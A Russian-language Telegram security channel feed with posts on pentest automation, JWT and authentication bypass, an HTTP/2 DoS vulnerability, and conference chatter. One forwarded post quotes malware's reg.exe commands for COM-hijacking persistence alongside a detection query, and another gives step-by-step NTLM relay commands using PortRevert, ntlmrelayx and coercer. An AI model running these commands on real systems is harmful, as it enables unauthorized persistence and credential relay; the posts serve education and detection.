Похек
15.9K subscribers
2.13K photos
111 videos
243 files
3.1K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Пентест на автопилоте: что доверить роботам, а что — нет?
#pentest #LLM #ML #AI #автоматизация #отчеты #report

Моя статья по поводу автоматизации пентеста, как процесса в целом, а не только похека компании. Это не полная статья на мой взгляд, я бы написал ещё 1-2 части продолжения. Если вы поддержите апвоутами и комментами, то мы сделаем продолжение.


ChatGPT генерирует эксплойты, автосканеры находят уязвимости за минуты, а фреймворки сами пишут отчеты. Неужели профессия пентестера обречена? Спойлер: нет, не обречена. Но кардинально меняется.

Современные инструменты творят чудеса. AMASS за полчаса соберет карту субдоменов компании, Nuclei проверит тысячи уязвимостей по готовым шаблонам, а Metasploit поможет получить доступ к системе парой команд. Скорость впечатляет, но есть нюанс. Автоматизация отлично справляется с рутиной и шаблонными задачами, а вот креативное мышление пока остается прерогативой человека. Найти цепочку нестандартных действий, которая приводит к компрометации системы, или понять, что безобидная на вид уязвимость может обанкротить компанию — такое машинам не под силу.

🔗Источник

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26👍3🌚1
Forwarded from Know Your Adversary
Всем привет!

Думаю, все уже устали от обычных механизмов закрепления в системе: папка автозагрузки, ключ Run, планировщик задач, службы… Давайте посмотрим на что-то более интересное — Event Triggered Execution: Component Object Model Hijacking (T1546.015).

Как всегда, нам нужен пример из реальной жизни. И он у меня есть — MucorAgent. Это вредоносное ПО использует reg.exe для изменения реестра и перехвата CLSID:

reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /t REG_SZ /d "C:\\Windows\\System32\\mscoree.dll" /F

reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /v Assembly /t REG_SZ /d "TaskLauncher, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" /F

reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /v Class /t REG_SZ /d "TaskLauncher.TaskHandler" /F

reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /v CodeBase /t REG_SZ /d "C:\\ProgramData\\Intel\\Logs\\Data\\TaskLauncher.dll" /F

reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /v RuntimeVersion /t REG_SZ /d "v4.0.30319" /F


Согласно отчёту, злоумышленник также использовал следующий CLSID: {613fba38-a3df-4ab8-9674-5604984a299a}.

Разумеется, мы можем искать подозрительные события, связанные с модификацией данных ключей реестра:

event_type: "processcreatewin"

AND

proc_file_path: "reg.exe"

AND

cmdline: "InprocServer32"


Увидимся завтра!

English version
9👍2
Пентест без пароля: как обходить механизмы аутентификации в реальных условиях
#pentest #пентест #MFA #2FA

Системы аутентификации стали сложнее: к традиционным логину и паролю добавилось активное использование токенов, управление сессиями и интеграция комплексной бизнес-логики. Но чем сложнее механизм, тем больше шансов допустить ошибку. В реальных пентестах даже крупные компании сталкиваются с критическими уязвимостями в архитектуре и настройке систем аутентификации. Специально для Cyber Media Сергей Зыбнев, ведущий специалист отдела по работе с уязвимостями ИС Бастион, разбирает техники пентеста, которые позволяют отработать защиту на практике.


Рабочие техники обхода

Один из самых устойчивых и эффективных методов обхода, который используют злоумышленники — атака на сессии. Предсказуемые идентификаторы и отсутствие XSS-защиты упрощают перехват или подделку токенов аутентификации. Особенно уязвимы WebSocket-соединения, где данные часто передаются без шифрования и валидации, что позволяет получить несанкционированный доступ к аккаунтам.

Слабая конфигурация JWT — еще один частый вектор взлома. На практике все еще встречаются маркеры с алгоритмом “none”, предсказуемыми секретными ключами вроде “secret” или “123456”, а также с отсутствием валидации поля “kid”. Распространенный способ атаки — замена RS256 на HS256 с использованием публичного ключа как HMAC-секрета.

Уязвимости проявляются и при несогласованности процессов. Например, сеанс начинается раньше, чем завершается проверка данных, особенно в микросервисной архитектуре. Отдельное внимание требует механизм восстановления доступа: в ряде случаев возможна повторная отправка одного и того же кода, либо отсутствует подтверждение принадлежности почты конкретному пользователю.

🔗Читать далее

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14❤‍🔥5👍3
Похек pinned a photo
Подломить и закрепиться: как злоумышленники используют IoT в кибератаках и при чем здесь DNS-туннелирование
#IoT #DNS #pivoting #APT #EDR #SOC

Всем привет! В этой статье автор хочет рассказать об интересном кейсе использования DNS-туннелей в современной реальности. Он, как и многие другие специалисты, считал, что DNS-туннели попросту неактуальны на текущий момент, так как данный транспорт требует много времени на передачу данных, а современные классы решений типа DNS filter, IDPS и NTA покрывают подобную технику. Однако не так давно вышел очень интересный ресерч о том, как malware-семплы могут дропаться через TXT-запись, об этом подробно говорилось в данной статье.

Поэтому автор решил подсветить еще один интересный кейс использования DNS-туннелей злоумышленниками.

🔗Читать далее

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
Please open Telegram to view this post
VIEW IN TELEGRAM
10🔥4
QTune — open-source решение для быстрого файн-тюнинга моделей
#LLM #AI #finetune

Сегодня речь пойдет про QTune - это open-source приложение с графическим интерфейсом, которое превращает сложный и требовательный процесс файнтюнинга в понятный и управляемый процесс, доступный каждому. Это не просто набор скриптов, а полноценная студия, охватывающая весь цикл: от создания датасета до запуска готовой модели локально.

Философия простоты: от идеи до модели без единой строчки кода
Главная идея QTune - предоставить полный контроль над процессом в рамках единого, интуитивно понятного интерфейса. Весь процесс разбит на логические этапы, представленные в виде вкладок в приложении.

В основе магии, позволяющей запускать всё это на потребительском железе, лежит технология QLoRA (Quantized Low-Rank Adaptation). Если говорить просто, вместо того чтобы изменять все миллиарды параметров исходной модели, мы "замораживаем" её и обучаем лишь небольшую, но очень эффективную "надстройку" (адаптер). Это снижает требования к видеопамяти в десятки раз, и вот уже ваша RTX 3060 или 4070 способна справиться с задачей, для которой раньше требовались серверные GPU.

🔗Читать далее

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥4
Мой коллега-внутрянщик написал очень полезный инструмент PortRevert
#AD #pentest #Microsoft #NTLM #relay

PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).

➡️Возможности
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур

➡️Использование
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
PortRevert.exe

2. Запустите ntlmrelayx на порту 4445:
ntlmrelayx.exe -smb-port 4445 -smb2support -debug

3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
coercer coerce -d cs.org -t dc1 -u test -p 'Password123!' -l pc3 --always-continue

(PortRevert должен быть запущен на хосте-слушателе, в данном случае - pc3)

➡️Как это работает
Жертва -> Порт 445 
↓ (перехват PortRedirector)
Жертва -> Порт 4445 -> ntlmrelayx
↓ (ответы)
ntlmrelayx -> Порт 4445
↓ (перенаправление обратно)
ntlmrelayx -> Порт 445 -> Жертва


💻 Github repo

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22🌚2❤‍🔥1
Карта OFFZONE 2025.pdf
15.2 MB
Карта OFFZONE 2025
#offzone2025
Ранее в чате обсуждали NPU в качестве решения по расширению видеопамяти для обычных пользовательских видях.

Ребята из Serverflow таки собрали сервер с ускорителями Huawei Atlas 300i Duo и Ascend 910/910B и показали как её запускать
https://youtu.be/7WvYEIE8GBA
Тестовая версия гайда - https://serverflow.ru/blog/tutorials/gayd-po-huawei-atlas-300i-duo-podgotovka-okruzheniya-i-zapusk-inferensa

Реальность поддержки дров оказалась и правда очень плачевной, но все таки работать на них можно. Но покупать в качестве расширителя видеопамяти в домашний комп - бред. Если у вас есть отдельная ферма - то туда пойдёт
❤‍🔥5
Media is too big
VIEW IN TELEGRAM
Лимитированный мерч на OFFZONE
#offzone2025

🔥 Специально к OFFZONE сделали лимитированный мерч для настоящих багхантеров. Учли, как быстро разбирают мерч, поэтому в этот раз будут условия раздачи:
1. Сдать хотя бы 1 оплаченный low+ отчёт на багбаунти платформе Бизона за последние полгода. Ребята также будут триажить во время ивента, так что сданные баги 21-22 августа будут засчитываться.
2. Быть подписанными на мой канал и канал площадки.

‼️ Проверять будем прямо на стенде. Все условия являются обязательными, попытки выпросить или выкрасть мерч будут пресекаться.

🎁 Новый мерч можно получить только на стенде BIZONE Bug Bounty, найти на карте OFFZONE, в магазине этот мерч продаваться не будет!

🧐 Дизайн останется в тайне, но я и некоторые члены команды бизон бб на ивенте уже будут в нём))
🧐 Тираж: 50 штук. В день будем выдавать максимум 25 штук, чтобы каждый вне зависимости от дня посещения имел возможность получить мерч.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥196
MadeYouReset: Новая HTTP/2 DoS атака, которую уже заблокировали
#research #http2 #http1 #http #DoS #CVE

Исследователи из Тель-Авивского университета обнаружили новую HTTP/2 DoS уязвимость под названием MadeYouReset (CVE-2025-8671). Интересно, что большинство крупных провайдеров уже защищены от неё благодаря мерам против прошлогодней атаки Rapid Reset.

HTTP/2 stream reset - это механизм, который позволяет клиенту отменить HTTP-запрос до получения ответа от сервера. Представьте это как возможность сказать "неважно" официанту, который уже пошёл на кухню с вашим заказом. Полезная функция, ведь её можно использовать для атак))

Разница с Rapid Reset:

Rapid Reset (CVE-2023-44487) работал через прямые команды сброса потоков - клиент создавал множество запросов и сразу их отменял, заставляя сервер тратить ресурсы впустую.

MadeYouReset использует более хитрый подход: вместо прямых команд сброса атакующий отправляет специально искаженные HTTP/2 frames, которые заставляют сам сервер инициировать сброс потоков. Это как подсунуть официанту неправильный заказ, чтобы он сам его отменил.

➡️Механизм атаки:

Шаг 1: Создание соединения
Атакующий устанавливает HTTP/2 соединение с целевым сервером.

Шаг 2: Отправка malformed frames
Клиент отправляет специально искаженные control frames, которые нарушают спецификацию HTTP/2.

Шаг 3: Принудительный reset
Сервер, обнаружив некорректные frames, автоматически инициирует сброс потоков для поддержания стабильности соединения.

Шаг 4: Истощение ресурсов
Массовые принудительные сбросы потоков перегружают сервер, приводя к отказу в обслуживании.

➡️Интерестинг момент

Уязвимость затрагивает только ограниченное количество HTTP/2 реализаций. Большинство крупных провайдеров (Cloudflare, AWS, Google) уже имеют защиту благодаря DoS'ам 2 года назад через Rapid Reset.

➡️Защитные меры:

Для администраторов:
- Обновление HTTP/2 серверов до последних версий
- Применение rate limiting для HTTP/2 соединений
- Мониторинг аномальной активности stream reset

Проверка версии:
# Проверка версии nginx с HTTP/2
nginx -V | grep http_v2

# Проверка Apache HTTP/2 модуля
apache2ctl -M | grep http2

# Мониторинг HTTP/2 stream resets
netstat -i | grep RST


🔗Источники:
- Cloudflare Blog
- CVE-2025-8671

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥95
Are you ready?)
#offzone2025
🔥68💔3🐳2
Похек pinned a file
Я пока ещё не приехал, скоро буду))

upd: через 25 минут буду
👍7
This media is not supported in your browser
VIEW IN TELEGRAM
Раздают мерч!
🔥7
На сегодня в раздаче 2 футболке осталось! Успейте забрать))
Мерч разобрали на сегодня! Приходите завтра, раздадим ещё 25 штук!!
🔥6😱2
This media is not supported in your browser
VIEW IN TELEGRAM
🔥55
Есть ощущение что тут допущена ошибка
🤯236👾5🔥2🐳2
Наконец докладики 🌚
🔥7